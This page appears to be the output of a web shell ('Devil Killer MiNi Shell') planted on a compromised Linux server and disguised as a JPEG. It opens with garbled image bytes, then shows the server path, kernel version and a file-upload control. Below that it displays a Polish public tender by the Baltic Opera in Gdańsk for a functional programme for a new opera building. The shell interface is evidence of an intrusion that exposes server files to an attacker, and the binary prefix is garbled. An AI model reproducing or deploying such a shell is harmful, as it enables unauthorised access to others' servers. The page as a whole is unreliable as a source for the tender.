JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251017/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251017/0048234501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie programu funkcjonalno-użytkowego, koncepcji funkcjonalnej, określenie planowanych kosztów prac projektowych oraz robót budowlanych dla zadania pn.: „Budowa Opery Bałtyckiej w Gdańsku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OPERA BAŁTYCKA W GDAŃSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190320600</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Zwycięstwa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-219</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 763 49 12/13</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@operabaltycka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://operabaltycka.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie programu funkcjonalno-użytkowego, koncepcji funkcjonalnej, określenie planowanych kosztów prac projektowych oraz robót budowlanych dla zadania pn.: „Budowa Opery Bałtyckiej w Gdańsku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5c377be0-6f23-41c3-a88f-d41e29a63fb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00482345</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00031886/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Opracowanie PFU, koncepcji funkcjonalnej, określenie planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych dla zadania pn.: „Budowa Opery Bałtyckiej w Gdańsku”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://operabaltycka.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://operabaltycka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w formie elektronicznej za pośrednictwem Platformy Zakupowej pod adresem: https://operabaltycka.ezamawiajacy.pl <br/>2.	Pełną obsługę techniczną Platformy zakupowej świadczy firma Otwarty Rynek Elektroniczny S.A. z siedzibą w Warszawie (02-672), ul. Domaniewska 49. W przypadku ewentualnych problemów technicznych prosimy o kontakt z infolinią techniczną pod numerem +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00), lub pod adresem e-mail: oneplace@marketplanet.pl<br/>3.	W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy znajdującej się pod adresem: https://operabaltycka.ezamawiajacy.pl w sekcji „Korespondencja”.<br/>4.	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę.<br/>5.	Ogólne zasady korzystania z Platformy określa SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO” (Dz. Urz. UE L 119 z 04.05.2016), Zamawiający informuje, że: <br/>1)	administratorem danych osobowych przekazywanych w ramach tego postępowania jest Opera Bałtycka w Gdańsku, Aleja Zwycięstwa 15, 80-219 Gdańsk, email: sekretariat@operabaltycka.pl; <br/>2)	kontakt e-mail z inspektorem ochrony danych: iod@operabaltycka.pl;<br/>3)	dane osobowe przetwarzane będą̨ na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postepowaniem, którego wartość przekracza 130 000 zł netto zgodnie z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz. U. z 2023 poz. 1605 z późn. zm.) oraz ustawy z dnia 14 lipca 1983 r. O narodowym zasobie archiwalnym i archiwach;<br/>4)	odbiorcami danych osobowych mogą być instytucje administracji publicznej, ze środków których finansowane jest zamówienie stanowiące przedmiot zamówienia, powołani biegli zewnętrzni - a w granicach celów ustalonych powyżej - również zewnętrzne kancelarie lub osoby świadczące usługi prawne, a także osoby lub podmioty, którym udostępniona zostanie dokumentacja postepowania w oparciu o przepisy obowiązującego prawa, w szczególności przepisy ustawy z 26 września 2001 r. o dostępie do informacji publicznej;<br/>5)	dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postepowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata okres przechowywania obejmuje cały okres trwania umowy;<br/>6)	w odniesieniu do ww. danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7)	każda osoba fizyczna, której dane osobowe przekazano Zamawiającemu w ofercie i/lub innych dokumentach składanych przez Wykonawcę̨ posiada:<br/>-	na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących;<br/>-	na podstawie art. 16 RODO prawo do sprostowania jej danych osobowych*;<br/>-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**;<br/>-	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO;<br/>8)	żadnej osobie fizycznej, której dane osobowe przekazano Zamawiającemu w ofercie i/lub innych dokumentach składanych przez Wykonawcę nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania jej danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>*Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku przedmiotowego postepowania ani zmianą postanowień umowy w zakresie niezgodnym z przepisami prawa stanowiącymi podstawę prowadzenia przedmiotowego postepowania. <br/>**Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">13/ZP/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie programu funkcjonalno-użytkowego (PFU) dla planowanego budynku Opery Bałtyckiej w Gdańsku wraz z zagospodarowaniem terenu i koncepcją układu komunikacyjnego, który będzie stanowił bazę merytoryczną i funkcjonalną dla przygotowania i przeprowadzenia międzynarodowego konkursu architektonicznego. Dokument PFU ma zawierać wszystkie wytyczne niezbędne do opracowania projektów konkursowych przez uczestników konkursu, w tym parametry funkcjonalne, technologiczne, akustyczne, sceniczne i przestrzenne.<br/>2.	Przedmiot zamówienia został szczegółowo opisany w OPZ, stanowiącym Załącznik nr 1 do SWZ oraz we wzorze umowy, stanowiącym Załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71210000-3 - Doradcze usługi architektoniczne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71500000-3 - Usługi związane z budownictwem</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Sposób obliczenia dla kryterium „Cena” (PK1) <br/>PK1 = [CN / CR x 60%] x 100 <br/>PK1 – ilość punktów dla kryterium<br/>CN – najniższa oferowana cena brutto <br/>CR – cena brutto oferty rozpatrywanej<br/>Oferta w tym kryterium może otrzymać maksymalnie 60 pkt.<br/>2)	Sposób obliczenia dla kryterium „Doświadczenie osób skierowanych do realizacji zamówienia” (PK2)<br/>1.	W ramach kryterium “Doświadczenie osób skierowanych do realizacji zamówienia” Zamawiający oceni dodatkowe doświadczenie osób skierowanych do realizacji zamówienia ponad doświadczenie wykazane na potrzeby spełnienia warunku udziału w postępowaniu, o którym mowa w rozdz. VI ust. 1 pkt 1.2. ppkt 1.2.3 SWZ, na zasadach określonych poniżej. <br/>2.	Zamawiający w kryterium “Doświadczenie osób skierowanych do realizacji zamówienia” przyzna ofercie następującą ilość punktów, jeżeli Wykonawca przedstawi dodatkowe doświadczenie osób skierowanych do realizacji zamówienia: <br/>1)	Projektanta, który w okresie ostatnich 20 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) - dodatkowo ponad doświadczenie wykazane dla spełnienia warunku udziału w postępowaniu - program funkcjonalno-użytkowy lub dokumentację projektową (obejmującą co najmniej projekt budowlany lub wykonawczy) dla budynku opery wyposażonego w widownię na nie mniej niż 800 miejsc siedzących, którego kubatura wynosi minimum 100.000 m3 – ofercie zostanie przyznane 10 punktów za każde takie opracowanie (jednak nie więcej niż 20 punktów);<br/>2)	Specjalistę ds. Technologii scenicznej, który w okresie ostatnich 15 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) - dodatkowo ponad doświadczenie wykazane dla spełnienia warunku udziału w postępowaniu - projekt technologii scenicznej sali operowej lub sali teatralnej o powierzchni sceny minimum 300 m2, wyposażonej w system technologii scenicznej, obejmujący co najmniej: <br/>a)	portal sceny oraz wieże portalowe z możliwością regulacji zmiany ich położenia - ofercie zostanie przyznane 5 punktów lub<br/>b)	mobilną widownię sterowaną elektrycznie – ofercie zostanie przyznane 5 punktów, <br/>przy czym wymóg z lit. a i b powyżej może być wykazany łącznie w ramach jednego projektu lub dwóch odrębnych; <br/>3)	Akustyka, który w okresie ostatnich 15 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) - dodatkowo ponad doświadczenie wykazane dla spełnienia warunku udziału w postępowaniu - projekt akustyki w zakresie akustyki wnętrz oraz ochrony przeciwdźwiękowej dla budynku opery, filharmonii, sali koncertowej z widownią na minimum 500 miejsc siedzących, bez wykorzystania systemów nagłośnieniowych, z zastosowaniem ustrojów akustycznych – ofercie zostanie przyznane 5 punktów; <br/>4)	Specjalistę ds. Oświetlenia scenicznego, który w okresie ostatnich 15 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) - dodatkowo ponad doświadczenie wykazane dla spełnienia warunku udziału w postępowaniu - projekt oświetlenia scenicznego w oparciu o technologię oświetlenia LED dla sali operowej lub sali teatralnej posiadającej widownię na minimum 500 miejsc siedzących, wyposażonej w system oświetlenia scenicznego obejmujący co najmniej: oprawy frontowe, górne, boczne; mosty oświetleniowe lub sztankiety z napędem elektrycznym lub hydraulicznym; system sterowania - ofercie zostanie przyznane 5 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający wyznaczył następujące warunki udziału w postępowaniu:<br/>1.2.1. w zakresie sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej lub finansowej niezbędnej do realizacji zamówienia, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 700.000,00 złotych.<br/><br/>1.2.2. w zakresie zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 20 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej jedną usługę o wartości co najmniej 700.000,00 złotych brutto, obejmującą opracowanie: <br/>a)	programu funkcjonalno-użytkowego lub <br/>b)	dokumentacji projektowej, obejmującej co najmniej projekt budowlany lub wykonawczy, <br/>dla budynku opery, filharmonii, teatru lub sali koncertowej, wyposażonego w widownię na nie mniej niż 800 miejsc siedzących, którego kubatura wynosi minimum 100.000 m3. <br/><br/>1.2.3. w zakresie zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że skieruje do realizacji zamówienia: <br/>1)	Projektanta, który w okresie ostatnich 20 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) co najmniej jeden program funkcjonalno-użytkowy lub dokumentację projektową (obejmującą co najmniej projekt budowlany lub wykonawczy) dla budynku opery, filharmonii, teatru lub sali koncertowej, wyposażonego w widownię na nie mniej niż 800 miejsc siedzących, którego kubatura wynosi minimum 100.000 m3;<br/>2)	Akustyka, który w okresie ostatnich 15 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) co najmniej jeden projekt akustyki w zakresie akustyki wnętrz oraz ochrony przeciwdźwiękowej dla budynku opery, filharmonii, sali koncertowej z widownią na minimum 500 miejsc siedzących, bez wykorzystania systemów nagłośnieniowych, z zastosowaniem ustrojów akustycznych;<br/>3)	Elektroakustyka, który w okresie ostatnich 15 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) co najmniej jeden projekt elektroakustyki w zakresie układów elektroakustycznych obejmujących co najmniej system audio (nagłośnienie, nagrywanie), system multimedialny, system inspicjenta, dźwiękowy system ostrzegawczy dla sali koncertowej, teatru, opery lub filharmonii z widownią na minimum 500 miejsc siedzących;<br/>4)	Specjalistę ds. Technologii scenicznej, który w okresie ostatnich 15 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) co najmniej jeden projekt technologii scenicznej sali operowej lub sali teatralnej o powierzchni sceny minimum 300 m2, wyposażonej w systemy technologii scenicznej, obejmujące co najmniej: <br/>i.	mechanikę górną z napędem hydraulicznym lub elektrycznym: sztankiety oświetleniowe i dekoracyjne, mosty oświetleniowe, kurtynę główną i kurtynę przeciwpożarową;<br/>ii.	mechanikę dolną z napędem hydraulicznym lub elektrycznym: zapadnie sceniczne, podesty ruchome, scenę obrotową;<br/>iii.	system sterowania komputerowego umożliwiający integrację wszystkich urządzeń technologii scenicznej.<br/>5)	Specjalistę ds. oświetlenia scenicznego, który w okresie ostatnich 15 lat przed upływem terminu składania ofert opracował (samodzielnie lub jako współautor) co najmniej jeden projekt oświetlenia scenicznego w oparciu o technologię oświetlenia LED dla sali operowej lub sali teatralnej, posiadającej widownię na minimum 500 miejsc siedzących, wyposażonej w  system oświetlenia scenicznego obejmujący co najmniej: oprawy frontowe, górne, boczne; mosty oświetleniowe lub sztankiety z napędem elektrycznym lub hydraulicznym; system sterowania;<br/>6)	Koordynatora BIM (Building Information Modeling), który w okresie ostatnich 5 lat przed upływem terminu składania ofert koordynował co najmniej dwa projekty architektoniczno-budowlane budynków, których kubatura wynosiła minimum 100.000 m3 każdy, zgodnie z metodologią BIM. <br/>Uwaga:<br/>1)	Na potrzeby oceny spełniania warunków udziału w postępowaniu przez salę koncertową należy rozumieć budynek, którego główną funkcją jest wykonywanie muzyki na żywo przed publicznością.<br/>2)	Wskazane powyżej funkcje mogą być łączone w ramach jednej osoby, z wyjątkiem Projektanta i Koordynatora BIM, którzy nie mogą wykonywać żadnej innej funkcji. <br/>3)	Dopuszcza się wykazanie tej samej usługi w odniesieniu do różnych osób skierowanych do realizacji zamówienia. <br/>4)	W przypadku, gdy za wykonane przez Wykonawcę usługi rozliczenie nastąpiło w innej niż w PLN walucie, Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu zobowiązany jest do przeliczenia wartości wykonanych usług przyjmując średni kurs złotego w stosunku do walut obcych określony w tabeli kursów średnich walut obcych Narodowego Banku Polskiego opublikowanych na dzień zamieszczenia ogłoszenia o zamówieniu oraz SWZ na Platformie.<br/>5)	W przypadku gdy Wykonawca realizował zamówienie jako jeden z grupy Wykonawców (konsorcjum) może powoływać się jedynie na swoje własne, realne doświadczenie, które zdobył realizując daną część zamówienia, która została mu przypisana w ramach grupy, tzn. może wykazywać się doświadczeniem jedynie w zakresie, jaki rzeczywiście dany podmiot wykonywał. Doświadczenia nie uzyskuje się̨ poprzez sam udział w konsorcjum, lecz poprzez konkretne czynności realizowane w jego ramach.<br/>6)	Jeżeli zakres usług przedstawionych w dokumencie złożonym na potwierdzenie, że usługi zostały wykonane w sposób należyty, jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie usług podać wartość usług potwierdzających spełnienie warunku udziału w postępowaniu.<br/>2.	Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>3.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których 